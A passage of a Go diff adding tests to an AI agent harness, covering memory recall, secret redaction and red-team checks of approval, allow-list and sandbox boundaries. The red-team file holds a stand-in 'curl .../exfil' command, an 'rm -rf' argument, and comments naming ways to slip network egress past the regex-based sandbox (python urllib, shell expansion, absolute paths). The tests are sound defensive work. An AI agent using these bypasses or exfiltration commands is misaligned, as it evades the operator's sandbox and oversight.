+		ErrorChainEnabled: true,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "max turns test"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusFailed)
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	if err != nil {
+		t.Fatalf("collectRunEvents: %v", err)
+	}
+
+	// Confirm it really was a max-turns failure.
+	var rfPayload map[string]any
+	for _, ev := range events {
+		if ev.Type == EventRunFailed {
+			rfPayload = ev.Payload
+			break
+		}
+	}
+	if rfPayload == nil {
+		t.Fatalf("no run.failed event on max-turns path; events: %v", eventTypes(events))
+	}
+	if rfPayload["reason"] != "max_turns_exhausted" {
+		t.Skipf("run didn't fail via max-turns path (reason=%v); skipping asymmetry assertion", rfPayload["reason"])
+	}
+
+	// ASSERT: error.context is ABSENT on the failRunMaxTurns path.
+	for _, ev := range events {
+		if ev.Type == EventErrorContext {
+			t.Errorf("error.context must be ABSENT on failRunMaxTurns path (terminal asymmetry), "+
+				"but found one; events: %v", eventTypes(events))
+		}
+	}
+}

--- a/internal/harness/runner_memory_recall_test.go
+++ b/internal/harness/runner_memory_recall_test.go
@@ -1,0 +1,177 @@
+package harness
+
+import (
+	"context"
+	"path/filepath"
+	"strings"
+	"testing"
+	"time"
+
+	om "go-agent-harness/internal/observationalmemory"
+)
+
+// recallModelStub is a tiny in-package observationalmemory.Model used by the
+// real observational-memory Service's ModelObserver. It returns a fixed
+// observation that carries a unique sentinel string so the test can prove the
+// turn-2 provider request received the turn-1 observation purely via cross-run
+// recall (memory snippet injection), not via the transcript.
+type recallModelStub struct {
+	observation string
+	calls       int
+}
+
+func (m *recallModelStub) Complete(_ context.Context, _ om.ModelRequest) (string, error) {
+	m.calls++
+	// IMPORTANCE prefix so ParseObservationChunks records a scored chunk.
+	return "IMPORTANCE:0.9\n" + m.observation, nil
+}
+
+// TestCrossRunObservationalMemoryRecall wires a REAL observationalmemory.Service
+// (SQLite store in t.TempDir, local coordinator, tiny model stub, ObserveMinTokens=1)
+// into a runner. Turn 1 runs against a fixed tenant+conversation+agent and crosses
+// the observe threshold so the model stub's observation is persisted to the
+// scope's SQLite record. Turn 2 runs against the SAME three axes and we assert
+// the captured provider request for turn 2 contains a SYSTEM message carrying
+// the turn-1 observation (recall == injection at turn start). We also assert the
+// scope's Snippet directly shows persistence across the two runs.
+func TestCrossRunObservationalMemoryRecall(t *testing.T) {
+	t.Parallel()
+
+	// Unique sentinel that appears nowhere in the prompts or transcript — the
+	// ONLY path for it to reach the turn-2 request is cross-run memory recall.
+	const sentinel = "SENTINEL_RECALL_user_prefers_tabs_over_spaces_42"
+
+	dbPath := filepath.Join(t.TempDir(), "obsmem.sqlite")
+	store, err := om.NewSQLiteStore(dbPath)
+	if err != nil {
+		t.Fatalf("new sqlite store: %v", err)
+	}
+	t.Cleanup(func() { _ = store.Close() })
+
+	model := &recallModelStub{observation: sentinel}
+
+	mem, err := om.NewService(om.ServiceOptions{
+		Mode:        om.ModeLocalCoordinator,
+		Store:       store,
+		Coordinator: om.NewLocalCoordinator(),
+		Observer:    om.ModelObserver{Model: model},
+		// No Reflector: keep ReflectThresholdTokens high so only a plain
+		// observation is persisted (no reflection compression).
+		DefaultEnabled: true,
+		DefaultConfig: om.Config{
+			ObserveMinTokens:       1,
+			SnippetMaxTokens:       900,
+			ReflectThresholdTokens: 1 << 30,
+		},
+	})
+	if err != nil {
+		t.Fatalf("new memory service: %v", err)
+	}
+	t.Cleanup(func() { _ = mem.Close() })
+
+	scope := om.ScopeKey{
+		TenantID:       "tenant-a",
+		ConversationID: "conv-recall-1",
+		AgentID:        "agent-x",
+	}
+
+	// capturingProvider records every CompletionRequest so we can inspect the
+	// turn-2 messages. Each run completes after a single content turn.
+	provider := &capturingProvider{turns: []CompletionResult{
+		{Content: "first turn answer"},
+		{Content: "second turn answer"},
+	}}
+
+	runner := NewRunner(provider, NewRegistry(), RunnerConfig{
+		DefaultModel:   "gpt-4.1-mini",
+		MaxSteps:       2,
+		MemoryManager:  mem,
+		AskUserTimeout: time.Second,
+	})
+
+	// --- Turn 1: observe and persist. ---
+	run1, err := runner.StartRun(RunRequest{
+		Prompt:         "Please remember my formatting choices for this project.",
+		TenantID:       scope.TenantID,
+		ConversationID: scope.ConversationID,
+		AgentID:        scope.AgentID,
+	})
+	if err != nil {
+		t.Fatalf("start run 1: %v", err)
+	}
+	if _, err := collectRunEvents(t, runner, run1.ID); err != nil {
+		t.Fatalf("collect run 1 events: %v", err)
+	}
+
+	// The observer must have been invoked at least once during turn 1.
+	if model.calls == 0 {
+		t.Fatalf("expected observer model to be called during turn 1, got 0 calls")
+	}
+
+	// Persistence reality check: the scope's Snippet (read straight from the
+	// SQLite-backed service) must now carry the turn-1 observation.
+	snippet, status, err := mem.Snippet(context.Background(), scope)
+	if err != nil {
+		t.Fatalf("snippet after turn 1: %v", err)
+	}
+	if status.ObservationCount == 0 {
+		t.Fatalf("expected at least one persisted observation after turn 1, got status %+v", status)
+	}
+	if !strings.Contains(snippet, sentinel) {
+		t.Fatalf("scope snippet does not carry the turn-1 observation; got %q", snippet)
+	}
+
+	// Reset captured requests so we only inspect turn-2 traffic.
+	provider.mu.Lock()
+	provider.calls = nil
+	provider.mu.Unlock()
+
+	// --- Turn 2: SAME tenant+conversation+agent — must recall via injection. ---
+	run2, err := runner.StartRun(RunRequest{
+		Prompt:         "What did I tell you earlier?",
+		TenantID:       scope.TenantID,
+		ConversationID: scope.ConversationID,
+		AgentID:        scope.AgentID,
+	})
+	if err != nil {
+		t.Fatalf("start run 2: %v", err)
+	}
+	if _, err := collectRunEvents(t, runner, run2.ID); err != nil {
+		t.Fatalf("collect run 2 events: %v", err)
+	}
+
+	provider.mu.Lock()
+	turn2Calls := append([]CompletionRequest(nil), provider.calls...)
+	provider.mu.Unlock()
+
+	if len(turn2Calls) == 0 {
+		t.Fatalf("expected at least one provider call on turn 2")
+	}
+
+	// Assert: turn 2's first request carries a SYSTEM message containing the
+	// turn-1 observation. This proves recall == injection at turn start.
+	var recalled bool
+	for _, msg := range turn2Calls[0].Messages {
+		if msg.Role == "system" &&
+			strings.Contains(msg.Content, sentinel) &&
+			strings.Contains(msg.Content, "<observational-memory>") {
+			recalled = true
+			break
+		}
+	}
+	if !recalled {
+		var b strings.Builder
+		for i, msg := range turn2Calls[0].Messages {
+			b.WriteString("\n  [")
+			b.WriteString(msg.Role)
+			b.WriteString("] ")
+			content := msg.Content
+			if len(content) > 200 {
+				content = content[:200] + "..."
+			}
+			b.WriteString(content)
+			_ = i
+		}
+		t.Fatalf("turn-2 request did not recall the turn-1 observation via a system memory message; messages:%s", b.String())
+	}
+}

--- a/internal/harness/runner_redaction_test.go
+++ b/internal/harness/runner_redaction_test.go
@@ -1,6 +1,7 @@
 package harness
 
 import (
+	"encoding/json"
 	"strings"
 	"testing"
 	"time"
@@ -203,5 +204,188 @@ func TestRunnerEmit_RedactionPipeline_NoneMode(t *testing.T) {
 		if string(evt.Type) == "run.test.drop" {
 			t.Errorf("expected event run.test.drop to be dropped, but found it in run events")
 		}
+	}
+}
+
+// payloadContainsString recursively walks a map[string]any and returns true if
+// any string value (at any nesting depth) contains substr.
+func payloadContainsString(payload map[string]any, substr string) bool {
+	return payloadValueContainsString(payload, substr)
+}
+
+func payloadValueContainsString(v any, substr string) bool {
+	switch val := v.(type) {
+	case string:
+		return strings.Contains(val, substr)
+	case map[string]any:
+		for _, child := range val {
+			if payloadValueContainsString(child, substr) {
+				return true
+			}
+		}
+	case []any:
+		for _, elem := range val {
+			if payloadValueContainsString(elem, substr) {
+				return true
+			}
+		}
+	}
+	return false
+}
+
+// allEventPayloadsAsJSON marshals every event's full payload to a JSON string
+// and returns them concatenated for easy scanning.
+func allEventPayloadsAsJSON(t *testing.T, events []Event) string {
+	t.Helper()
+	var sb strings.Builder
+	for _, ev := range events {
+		b, err := json.Marshal(ev.Payload)
+		if err != nil {
+			t.Fatalf("marshal event %s payload: %v", ev.ID, err)
+		}
+		sb.Write(b)
+		sb.WriteByte('\n')
+	}
+	return sb.String()
+}
+
+// TestTC1_SnapshotMemorySnippetSecretRedacted (T-C1) verifies that when a
+// RedactionPipeline is configured with the built-in api_key pattern, a
+// sk-...–style secret placed in the observational memory snippet is redacted
+// in the stored llm.request.snapshot event and does not appear verbatim in any
+// event payload across all sinks.
+func TestTC1_SnapshotMemorySnippetSecretRedacted(t *testing.T) {
+	t.Parallel()
+
+	// A realistic-looking fake API key that matches the built-in sk-... pattern.
+	// The regex is: sk-[A-Za-z0-9_-]{20,}
+	const rawSecret = "sk-fakesecretkey1234567890abcdef"
+
+	// Configure the built-in redaction pipeline (no custom patterns needed;
+	// the api_key rule matches sk-... out of the box).
+	pipeline := redaction.NewPipeline(redaction.NewRedactor(nil), redaction.EventClassConfig{})
+
+	memStub := &memoryStub{snippet: "Context: " + rawSecret}
+
+	prov := &stubProvider{turns: []CompletionResult{
+		{Content: "done"},
+	}}
+	runner := NewRunner(prov, NewRegistry(), RunnerConfig{
+		DefaultModel:           "test-model",
+		DefaultSystemPrompt:    "You are helpful.",
+		MaxSteps:               2,
+		CaptureRequestEnvelope: true,
+		SnapshotMemorySnippet:  true,
+		MemoryManager:          memStub,
+		RedactionPipeline:      pipeline,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "hello"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+
+	events := collectEvents(t, runner, run.ID)
+
+	// --- Assertion 1: llm.request.snapshot must be present and its
+	// memory_snippet must contain the REDACTED marker, not the raw secret.
+	var snapshots []Event
+	for _, ev := range events {
+		if ev.Type == EventLLMRequestSnapshot {
+			snapshots = append(snapshots, ev)
+		}
+	}
+	if len(snapshots) == 0 {
+		t.Fatal("no llm.request.snapshot events found — CaptureRequestEnvelope may not be working")
+	}
+	snap := snapshots[0]
+	memSnippet, _ := snap.Payload["memory_snippet"].(string)
+	if !strings.Contains(memSnippet, "[REDACTED:api_key]") {
+		t.Errorf("T-C1: memory_snippet in llm.request.snapshot was not redacted: got %q, want it to contain [REDACTED:api_key]", memSnippet)
+	}
+	if strings.Contains(memSnippet, rawSecret) {
+		t.Errorf("T-C1: raw secret still present in memory_snippet: %q", memSnippet)
+	}
+
+	// --- Assertion 2: the raw secret must not appear in ANY event payload
+	// (across all event types and all nesting levels) stored in the run.
+	for _, ev := range events {
+		if payloadContainsString(ev.Payload, rawSecret) {
+			t.Errorf("T-C1: raw secret found in event %s (type=%s) payload", ev.ID, ev.Type)
+		}
+	}
+
+	// Cross-check: the concatenated JSON of all payloads must not contain the secret.
+	allPayloads := allEventPayloadsAsJSON(t, events)
+	if strings.Contains(allPayloads, rawSecret) {
+		t.Errorf("T-C1: raw secret appears in serialized event payloads (cross-check)")
+	}
+}
+
+// TestTC2_SnapshotEventSuppressedByStorageModeNone (T-C2) verifies that an
+// operator can fully suppress the llm.request.snapshot event class by mapping
+// its event type to StorageModeNone in the RedactionPipeline config. No
+// llm.request.snapshot event should appear in the stored run history.
+func TestTC2_SnapshotEventSuppressedByStorageModeNone(t *testing.T) {
+	t.Parallel()
+
+	// Map the snapshot event class to StorageModeNone: the pipeline drops it.
+	cfg := redaction.EventClassConfig{
+		string(EventLLMRequestSnapshot): redaction.StorageModeNone,
+	}
+	pipeline := redaction.NewPipeline(redaction.NewRedactor(nil), cfg)
+
+	memStub := &memoryStub{snippet: "some memory context"}
+
+	prov := &stubProvider{turns: []CompletionResult{
+		{Content: "done"},
+	}}
+	runner := NewRunner(prov, NewRegistry(), RunnerConfig{
+		DefaultModel:           "test-model",
+		DefaultSystemPrompt:    "You are helpful.",
+		MaxSteps:               2,
+		CaptureRequestEnvelope: true,
+		SnapshotMemorySnippet:  true,
+		MemoryManager:          memStub,
+		RedactionPipeline:      pipeline,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "hello"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+	waitForStatus(t, runner, run.ID, RunStatusCompleted, RunStatusFailed)
+
+	events := collectEvents(t, runner, run.ID)
+
+	// The run must have completed with at least some events (sanity check).
+	if len(events) == 0 {
+		t.Fatal("T-C2: expected at least one event (run.started or run.completed)")
+	}
+
+	// No llm.request.snapshot event must be present — StorageModeNone suppresses it.
+	for _, ev := range events {
+		if ev.Type == EventLLMRequestSnapshot {
+			t.Errorf("T-C2: llm.request.snapshot event found in stored run history but should have been suppressed by StorageModeNone")
+		}
+	}
+
+	// Verify other events (run.started, run.completed) are still present —
+	// only the snapshot class was suppressed.
+	var hasStarted, hasCompleted bool
+	for _, ev := range events {
+		if ev.Type == EventRunStarted {
+			hasStarted = true
+		}
+		if ev.Type == EventRunCompleted {
+			hasCompleted = true
+		}
+	}
+	if !hasStarted {
+		t.Error("T-C2: run.started event missing — only llm.request.snapshot should be suppressed")
+	}
+	if !hasCompleted {
+		t.Error("T-C2: run.completed event missing — only llm.request.snapshot should be suppressed")
 	}
 }

--- a/internal/harness/runner_redteam_test.go
+++ b/internal/harness/runner_redteam_test.go
@@ -1,0 +1,500 @@
+package harness
+
+// Red-team (deliverable F): assert the runtime permission boundaries that are
+// GENUINELY enforced by the runner, and DOCUMENT the known sandbox bypasses that
+// are NOT enforced so the suite does not overclaim a guarantee the code lacks.
+//
+// Three enforced boundaries are asserted here:
+//
+//  1. T-F-approval-deny  — ApprovalPolicyAll + a denying ApprovalBroker pauses the
+//     run at waiting_for_approval, emits tool.approval_required then
+//     tool.approval_denied, the tool HANDLER NEVER RUNS, and the LLM receives a
+//     permission_denied tool result.
+//  2. T-F-skill-block    — an active skill constraint whose allowed_tools list omits
+//     a tool causes that tool call to emit tool.call.blocked with
+//     reason=not_in_allowed_tools, and the HANDLER NEVER RUNS.
+//  3. T-F-sandbox-network — a real `bash` tool under SandboxScopeLocal rejects a
+//     `curl` command BEFORE any network egress; the violation surfaces on the
+//     ERROR field of tool.call.completed containing "sandbox violation" (it is NOT
+//     a tool.call.blocked event — sandbox violations are tool execution errors).
+//
+// NOT enforced (documented, deliberately not asserted as blocked): the
+// SandboxScopeLocal network filter is a set of regexes over the raw command
+// string (internal/harness/tools/sandbox.go networkRestrictedPatterns), so it is
+// trivially bypassable. See TestRedTeam_SandboxNetworkRegexBypasses_NotEnforced
+// below, which proves these bypasses currently SUCCEED (no "sandbox violation"),
+// documenting the gap rather than pretending it is closed.
+
+import (
+	"context"
+	"encoding/json"
+	"strings"
+	"sync/atomic"
+	"testing"
+	"time"
+)
+
+// TestRedTeam_ApprovalDeny_BlocksTool asserts the approval-deny boundary
+// (T-F-approval-deny). With ApprovalPolicyAll and an InMemoryApprovalBroker that
+// denies, a mutating tool call must: pause the run at waiting_for_approval, emit
+// tool.approval_required then tool.approval_denied, never invoke the tool handler,
+// and hand the LLM a permission_denied result.
+func TestRedTeam_ApprovalDeny_BlocksTool(t *testing.T) {
+	t.Parallel()
+
+	broker := NewInMemoryApprovalBroker()
+
+	// Sentinel: set to 1 the instant the handler body runs. It must stay 0.
+	var handlerRan atomic.Int32
+
+	provider := &stubProvider{
+		turns: []CompletionResult{
+			{
+				ToolCalls: []ToolCall{{
+					ID:        "call_mutate",
+					Name:      "danger_write",
+					Arguments: `{"value":"rm -rf"}`,
+				}},
+			},
+			// After the deny, the LLM observes the permission_denied result and stops.
+			{Content: "understood, the write was denied"},
+		},
+	}
+
+	registry := NewRegistry()
+	_ = registry.RegisterWithOptions(ToolDefinition{
+		Name:        "danger_write",
+		Description: "a mutating tool that must not run without approval",
+		Parameters: map[string]any{
+			"type":       "object",
+			"properties": map[string]any{"value": map[string]any{"type": "string"}},
+		},
+		Mutating: true,
+	}, func(_ context.Context, args json.RawMessage) (string, error) {
+		handlerRan.Store(1) // MUST NOT happen when denied.
+		return string(args), nil
+	}, RegisterOptions{})
+
+	runner := NewRunner(provider, registry, RunnerConfig{
+		ApprovalBroker: broker,
+	})
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt: "attempt a destructive write",
+		Permissions: &PermissionConfig{
+			Sandbox:  SandboxScopeUnrestricted,
+			Approval: ApprovalPolicyAll,
+		},
+	})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+
+	// Wait for the broker to hold a pending approval for this call.
+	deadline := time.Now().Add(5 * time.Second)
+	for {
+		if p, ok := broker.Pending(run.ID); ok && p.CallID == "call_mutate" {
+			break
+		}
+		if time.Now().After(deadline) {
+			t.Fatal("timed out waiting for pending approval in broker")
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+
+	// The run must be paused at waiting_for_approval before any decision is made.
+	r, ok := runner.GetRun(run.ID)
+	if !ok {
+		t.Fatal("GetRun: run not found")
+	}
+	if r.Status != RunStatusWaitingForApproval {
+		t.Fatalf("run status = %q, want %q while approval pending", r.Status, RunStatusWaitingForApproval)
+	}
+	// Handler must not have run while merely waiting.
+	if handlerRan.Load() != 0 {
+		t.Fatal("tool handler ran before approval decision (must wait for approval)")
+	}
+
+	// Subscribe before denying so we capture the full denial event sequence.
+	history, stream, cancel, subErr := runner.Subscribe(run.ID)
+	if subErr != nil {
+		t.Fatalf("Subscribe: %v", subErr)
+	}
+	defer cancel()
+
+	if err := broker.Deny(run.ID); err != nil {
+		t.Fatalf("Deny: %v", err)
+	}
+
+	events := drainUntilTerminal(t, history, stream)
+
+	// The tool handler must NEVER have run.
+	if handlerRan.Load() != 0 {
+		t.Error("tool handler ran despite approval being DENIED — approval gate not enforced")
+	}
+
+	// Run completes (the LLM consumes the denial result and finishes).
+	r, ok = runner.GetRun(run.ID)
+	if !ok {
+		t.Fatal("GetRun after deny: run not found")
+	}
+	if r.Status != RunStatusCompleted {
+		t.Errorf("run status = %q after deny, want completed", r.Status)
+	}
+
+	// Event sequence: approval_required precedes approval_denied.
+	requireEventOrder(t, events,
+		string(EventToolApprovalRequired),
+		string(EventToolApprovalDenied),
+	)
+
+	var requiredSeen, deniedSeen bool
+	for _, ev := range events {
+		switch ev.Type {
+		case EventToolApprovalRequired:
+			requiredSeen = true
+			if ev.Payload["call_id"] != "call_mutate" {
+				t.Errorf("approval_required call_id = %v, want call_mutate", ev.Payload["call_id"])
+			}
+		case EventToolApprovalDenied:
+			deniedSeen = true
+			if ev.Payload["call_id"] != "call_mutate" {
+				t.Errorf("approval_denied call_id = %v, want call_mutate", ev.Payload["call_id"])
+			}
+		case EventToolApprovalGranted:
+			t.Error("unexpected tool.approval_granted event on a DENIED run")
+		}
+	}
+	if !requiredSeen {
+		t.Error("expected tool.approval_required event, not found")
+	}
+	if !deniedSeen {
+		t.Error("expected tool.approval_denied event, not found")
+	}
+
+	// The LLM must have received a permission_denied result for the denied call.
+	payload := toolMessagePayload(t, runner, run.ID, "danger_write")
+	errField, ok := payload["error"].(map[string]any)
+	if !ok {
+		t.Fatalf("denied tool result missing structured error object: %+v", payload)
+	}
+	if code, _ := errField["code"].(string); code != "permission_denied" {
+		t.Errorf("denied tool result error code = %q, want permission_denied (payload=%+v)", code, payload)
+	}
+}
+
+// TestRedTeam_SkillConstraint_BlocksTool asserts the allowed-tools boundary
+// (T-F-skill-block). A skill activates a constraint whose allowed_tools omits
+// `forbidden_tool`; the subsequent call to `forbidden_tool` must emit
+// tool.call.blocked with reason=not_in_allowed_tools, and its handler must never
+// run.
+func TestRedTeam_SkillConstraint_BlocksTool(t *testing.T) {
+	t.Parallel()
+
+	// Sentinel: the forbidden tool's handler must never execute.
+	var forbiddenRan atomic.Int32
+
+	provider := &stubProvider{
+		turns: []CompletionResult{
+			// Turn 1: activate a skill whose allowed_tools is ["grep"] (no forbidden_tool).
+			{
+				ToolCalls: []ToolCall{{
+					ID:        "call_skill",
+					Name:      "skill",
+					Arguments: `{"command":"locked-skill"}`,
+				}},
+			},
+			// Turn 2: attempt the now-disallowed tool.
+			{
+				ToolCalls: []ToolCall{{
+					ID:        "call_forbidden",
+					Name:      "forbidden_tool",
+					Arguments: `{"value":"x"}`,
+				}},
+			},
+			{Content: "done"},
+		},
+	}
+
+	registry := NewRegistry()
+	// The skill tool returns a constraint that omits forbidden_tool.
+	_ = registry.Register(ToolDefinition{
+		Name:        "skill",
+		Description: "activates a skill constraint",
+		Parameters:  map[string]any{"type": "object"},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		out, _ := json.Marshal(map[string]any{
+			"skill":         "locked-skill",
+			"instructions":  "Only grep is permitted.",
+			"allowed_tools": []string{"grep"},
+		})
+		return string(out), nil
+	})
+	_ = registry.Register(ToolDefinition{
+		Name:        "grep",
+		Description: "allowed under the constraint",
+		Parameters:  map[string]any{"type": "object"},
+	}, func(_ context.Context, _ json.RawMessage) (string, error) {
+		return `{"matches":[]}`, nil
+	})
+	_ = registry.Register(ToolDefinition{
+		Name:        "forbidden_tool",
+		Description: "NOT in the skill's allowed_tools — must be blocked",
+		Parameters: map[string]any{
+			"type":       "object",
+			"properties": map[string]any{"value": map[string]any{"type": "string"}},
+		},
+	}, func(_ context.Context, args json.RawMessage) (string, error) {
+		forbiddenRan.Store(1) // MUST NOT happen.
+		return string(args), nil
+	})
+
+	runner := NewRunner(provider, registry, RunnerConfig{
+		MaxSteps: 5,
+	})
+
+	run, err := runner.StartRun(RunRequest{Prompt: "use the locked skill then misbehave"})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	if err != nil {
+		t.Fatalf("collectRunEvents: %v", err)
+	}
+
+	// The forbidden tool's handler must NEVER have run.
+	if forbiddenRan.Load() != 0 {
+		t.Error("forbidden_tool handler ran despite being outside the skill's allowed_tools — constraint not enforced")
+	}
+
+	var blockedSeen bool
+	for _, ev := range events {
+		if ev.Type != EventToolCallBlocked {
+			continue
+		}
+		if tool, _ := ev.Payload["tool"].(string); tool != "forbidden_tool" {
+			continue
+		}
+		blockedSeen = true
+		if reason, _ := ev.Payload["reason"].(string); reason != "not_in_allowed_tools" {
+			t.Errorf("blocked reason = %q, want not_in_allowed_tools", reason)
+		}
+		if skill, _ := ev.Payload["skill"].(string); skill != "locked-skill" {
+			t.Errorf("blocked skill = %q, want locked-skill", skill)
+		}
+	}
+	if !blockedSeen {
+		t.Fatalf("expected tool.call.blocked for forbidden_tool, events=%v", eventTypes(events))
+	}
+}
+
+// TestRedTeam_SandboxNetwork_BlocksCurl asserts the local-sandbox network
+// boundary (T-F-sandbox-network) using the REAL bash tool. Under
+// SandboxScopeLocal a `curl` command is rejected by CheckSandboxCommand BEFORE
+// any process is spawned, so this needs no real network egress. The violation is
+// a tool execution error — it surfaces on the ERROR field of tool.call.completed
+// (NOT a tool.call.blocked event).
+func TestRedTeam_SandboxNetwork_BlocksCurl(t *testing.T) {
+	t.Parallel()
+
+	workspace := t.TempDir()
+	// Real registry with the actual bash tool. Registry default scope is workspace;
+	// the per-run SandboxScopeLocal in Permissions is what is enforced at exec time
+	// (injected into the tool context by the step engine).
+	registry := NewDefaultRegistryWithOptions(workspace, DefaultRegistryOptions{
+		ApprovalMode: ToolApprovalModeFullAuto,
+		SandboxScope: SandboxScopeWorkspace,
+	})
+
+	provider := &continuationProvider{
+		turns: []CompletionResult{
+			{
+				ToolCalls: []ToolCall{{
+					ID:        "call_curl",
+					Name:      "bash",
+					Arguments: `{"command":"curl https://example.com/exfil"}`,
+				}},
+			},
+			{Content: "done"},
+		},
+	}
+
+	runner := NewRunner(provider, registry, RunnerConfig{
+		DefaultModel: "test-model",
+		MaxSteps:     4,
+	})
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt: "exfiltrate via curl",
+		Permissions: &PermissionConfig{
+			Sandbox:  SandboxScopeLocal,
+			Approval: ApprovalPolicyNone,
+		},
+	})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+
+	events, err := collectRunEvents(t, runner, run.ID)
+	if err != nil {
+		t.Fatalf("collectRunEvents: %v", err)
+	}
+
+	// Assert on the ERROR field of tool.call.completed for the curl call.
+	var completedSeen bool
+	for _, ev := range events {
+		if ev.Type != EventToolCallCompleted {
+			continue
+		}
+		if callID, _ := ev.Payload["call_id"].(string); callID != "call_curl" {
+			continue
+		}
+		completedSeen = true
+		errField, _ := ev.Payload["error"].(string)
+		if !strings.Contains(errField, "sandbox violation") {
+			t.Errorf("tool.call.completed error = %q, want it to contain \"sandbox violation\"", errField)
+		}
+	}
+	if !completedSeen {
+		t.Fatalf("expected tool.call.completed for call_curl, events=%v", eventTypes(events))
+	}
+
+	// Sandbox violations are NOT block events.
+	for _, ev := range events {
+		if ev.Type == EventToolCallBlocked {
+			t.Errorf("sandbox violation must not emit tool.call.blocked, but one was emitted: %+v", ev.Payload)
+		}
+	}
+
+	// Cross-check the tool result handed to the LLM also carries the violation.
+	payload := toolMessagePayload(t, runner, run.ID, "bash")
+	if errMsg, _ := payload["error"].(string); !strings.Contains(errMsg, "sandbox violation") {
+		t.Errorf("bash tool result error = %v, want it to contain \"sandbox violation\"", payload["error"])
+	}
+}
+
+// TestRedTeam_SandboxNetworkRegexBypasses_NotEnforced DOCUMENTS (does not claim a
+// guarantee for) the known regex-only bypasses of the SandboxScopeLocal network
+// filter. The filter is a set of regexes over the raw command string
+// (internal/harness/tools/sandbox.go), so commands that reach the network without
+// matching curl/wget/nc/netcat/telnet are NOT blocked.
+//
+// This test deliberately asserts the CURRENT behaviour: each bypass command does
+// NOT produce a "sandbox violation". To keep it network-free and deterministic,
+// each command is a harmless local stand-in for the real egress vector (e.g.
+// `python3 -c 'pass'` stands in for python urllib exfiltration). If a future fix
+// closes one of these holes, this test will fail and must be updated alongside the
+// red-team claims — at which point the bypass should graduate to an asserted
+// blocked boundary above.
+func TestRedTeam_SandboxNetworkRegexBypasses_NotEnforced(t *testing.T) {
+	t.Parallel()
+
+	workspace := t.TempDir()
+
+	// Each case is a documented bypass of the curl/wget/nc/netcat/telnet regexes.
+	// The "command" is a harmless local proxy for the real egress technique so the
+	// test performs no network I/O.
+	cases := []struct {
+		name    string
+		command string
+		note    string
+	}{
+		{
+			name:    "python_urllib",
+			command: `python3 -c 'pass'`,
+			note:    "real exfil would be python3 -c 'import urllib.request; ...' — no curl/wget token",
+		},
+		{
+			name:    "command_substitution",
+			command: `echo "$(echo hi)"`,
+			note:    "real exfil could hide the egress binary behind shell expansion",
+		},
+		{
+			name:    "absolute_path_passthrough",
+			command: `/bin/echo passthrough`,
+			note:    "invoking a binary by absolute path is not matched by the bare-word regexes",
+		},
+	}
+
+	for _, tc := range cases {
+		tc := tc
+		t.Run(tc.name, func(t *testing.T) {
+			t.Parallel()
+
+			registry := NewDefaultRegistryWithOptions(workspace, DefaultRegistryOptions{
+				ApprovalMode: ToolApprovalModeFullAuto,
+				SandboxScope: SandboxScopeLocal,
+			})
+
+			provider := &continuationProvider{
+				turns: []CompletionResult{
+					{
+						ToolCalls: []ToolCall{{
+							ID:        "call_bypass",
+							Name:      "bash",
+							Arguments: mustJSON(map[string]any{"command": tc.command}),
+						}},
+					},
+					{Content: "done"},
+				},
+			}
+
+			runner := NewRunner(provider, registry, RunnerConfig{
+				DefaultModel: "test-model",
+				MaxSteps:     4,
+			})
+
+			run, err := runner.StartRun(RunRequest{
+				Prompt: "documented bypass: " + tc.note,
+				Permissions: &PermissionConfig{
+					Sandbox:  SandboxScopeLocal,
+					Approval: ApprovalPolicyNone,
+				},
+			})
+			if err != nil {
+				t.Fatalf("StartRun: %v", err)
+			}
+
+			if _, err := collectRunEvents(t, runner, run.ID); err != nil {
+				t.Fatalf("collectRunEvents: %v", err)
+			}
+
+			// DOCUMENTED GAP: the command is NOT blocked by the local sandbox.
+			payload := toolMessagePayload(t, runner, run.ID, "bash")
+			if errMsg, ok := payload["error"].(string); ok && strings.Contains(errMsg, "sandbox violation") {
+				t.Fatalf("bypass %q was unexpectedly blocked — the documented regex gap appears closed; "+
+					"promote it to an asserted blocked boundary and update the red-team claims. payload=%+v",
+					tc.name, payload)
+			}
+		})
+	}
+}
+
+// drainUntilTerminal appends streamed events to the subscription history slice
+// until a terminal event arrives or the timeout elapses.
+func drainUntilTerminal(t *testing.T, history []Event, stream <-chan Event) []Event {
+	t.Helper()
+	events := append([]Event(nil), history...)
+	for _, ev := range events {
+		if IsTerminalEvent(ev.Type) {
+			return events
+		}
+	}
+	timeout := time.After(5 * time.Second)
+	for {
+		select {
+		case ev, ok := <-stream:
+			if !ok {
+				return events
+			}
+			events = append(events, ev)
+			if IsTerminalEvent(ev.Type) {
+				return events
+			}
+		case <-timeout:
+			t.Fatal("timed out draining events until terminal")
+			return events
+		}
+	}
+}

--- a/internal/harness/runner_shutdown_test.go
+++ b/internal/harness/runner_shutdown_test.go
@@ -1,0 +1,289 @@
+package harness
+
+import (
+	"context"
+	"errors"
+	"runtime"
+	"strings"
+	"sync"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/require"
+)
+
+// runnerGoroutineStackContains reports whether the full goroutine stack dump
+// (all goroutines) contains the given substring. It is file-unique to
+// runner_shutdown_test.go and used by TestRunnerWithoutShutdownLeaksDispatcher.
+func runnerGoroutineStackContains(substr string) bool {
+	buf := make([]byte, 1<<20) // 1 MiB
+	n := runtime.Stack(buf, true)
+	return strings.Contains(string(buf[:n]), substr)
+}
+
+// assertNoRunnerGoroutineLeak polls runtime.NumGoroutine() until it drops to
+// <= baseline within ~2 seconds. On each iteration runtime.GC() is called to
+// give the runtime a chance to clean up finalizers and stale goroutines. If
+// the goroutine count does not drop within the deadline the full goroutine
+// stack is dumped and the test fails.
+//
+// This helper is defined exactly once here and reused by other harness tests.
+func assertNoRunnerGoroutineLeak(t *testing.T, baseline int) {
+	t.Helper()
